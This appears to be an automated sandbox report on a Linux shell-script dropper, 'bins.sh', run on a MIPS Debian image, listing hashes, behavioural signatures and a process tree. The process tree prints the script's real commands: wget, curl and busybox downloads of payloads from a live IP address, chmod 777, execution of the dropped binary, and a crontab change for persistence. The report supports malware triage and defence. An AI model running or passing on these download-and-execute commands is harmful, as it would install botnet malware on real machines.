Analysis
-
max time kernel
149s -
max time network
148s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
09-11-2024 10:42
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
dbbbfb2de892410f6016324f5c72c881
-
SHA1
24f8818e5bf61c88bd7c47818ce2ab9a3de68f94
-
SHA256
0de635c2e545ff9866cce84becebf513f8c7b2276e78fb2eda6f39f1d7149e49
-
SHA512
a1ae894484d24a377e5ad84885c8758aaced9b067f64e0591f4892716e4bd844605aed37cf7e8f67c94b89889cc18e66e63439ea7095334710c9886efa901016
-
SSDEEP
192:GcUjeSO0HQTDiswV1VZcIigJS25QQQcPTYJS25QQVPTYXwJHITDiswVbcUjeSJj:1NTDiJV1VqbgycPTY3PTYA+TDiJVb
Malware Config
Signatures
-
Contacts a large (2168) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid process 731 chmod -
Executes dropped EXE 1 IoCs
Processes:
XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioRioc pid process /tmp/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR 732 XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR -
Renames itself 1 IoCs
Processes:
XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioRpid process 733 XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.NvxzGY crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Processes:
XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioRdescription ioc process File opened for reading /proc/825/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/906/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/937/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/946/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/964/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/73/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/319/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/727/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/981/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/1032/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/779/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/848/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/5/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/756/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/773/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/802/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/961/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/987/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/8/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/11/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/69/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/1005/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/72/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/925/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/933/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/817/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/934/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/941/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/994/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/347/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/664/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/740/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/923/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/17/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/749/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/896/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/1004/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/23/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/790/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/830/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/809/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/895/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/980/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/1/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/148/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/669/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/956/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/978/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/1034/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/21/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/114/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/814/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/4/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/847/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/881/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/1024/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/1025/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/668/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/708/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/880/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/852/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/970/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/995/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR File opened for reading /proc/1009/cmdline XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlbusyboxdescription ioc process File opened for modification /tmp/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR wget File opened for modification /tmp/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR curl File opened for modification /tmp/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:700
-
/bin/rm/bin/rm bins.sh2⤵PID:702
-
/usr/bin/wgetwget http://87.120.84.230/bins/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR2⤵
- Writes file to tmp directory
PID:703 -
/usr/bin/curlcurl -O http://87.120.84.230/bins/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR2⤵
- Writes file to tmp directory
PID:724 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR2⤵
- Writes file to tmp directory
PID:730 -
/bin/chmodchmod 777 XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR2⤵
- File and Directory Permissions Modification
PID:731 -
/tmp/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR./XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:732 -
/bin/shsh -c "crontab -l"3⤵PID:734
-
/usr/bin/crontabcrontab -l4⤵PID:735
-
/bin/shsh -c "crontab -"3⤵PID:736
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:737 -
/bin/rmrm XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR2⤵PID:741
-
/usr/bin/wgetwget http://87.120.84.230/bins/I0lFteEawbJ2WBcXsletRRgRlmO7jvdj722⤵PID:742
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
151KB
MD56c583043d91c55aa470c08c87058e917
SHA1abf65a5b9bba69980278ad09356e53de8bb89439
SHA2562d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948
SHA51282ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5
-
Filesize
210B
MD52861b320495e2318e0843ae7d57a6110
SHA10efafa3da2c1979e831af58a6b7d8bcb781df75b
SHA256c7251c73ec9279ce977869a1ff7d3db374b5fa6e85490a6ef93c2170ee1f867d
SHA512681086df066a2ea4d4b29e90f650eb57f2b6313a45f138bb71e2cd0ad7271981dc4095217b1b1a21556e4985a3e60b102f4cc0c71c39bea7728b357d7c02a7c1